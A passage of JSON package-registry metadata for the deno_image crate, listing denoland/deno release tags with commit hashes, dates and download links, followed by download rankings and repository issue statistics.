parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T06:42:24.269Z","dependent_packages_count":0,"downloads":48688,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":93.04212554579362,"dependent_repos_count":18.162332726404923,"dependent_packages_count":24.016687585073097,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":45.07371528575721},"purl":"pkg:cargo/deno_image","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_image","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_image","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_image/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":4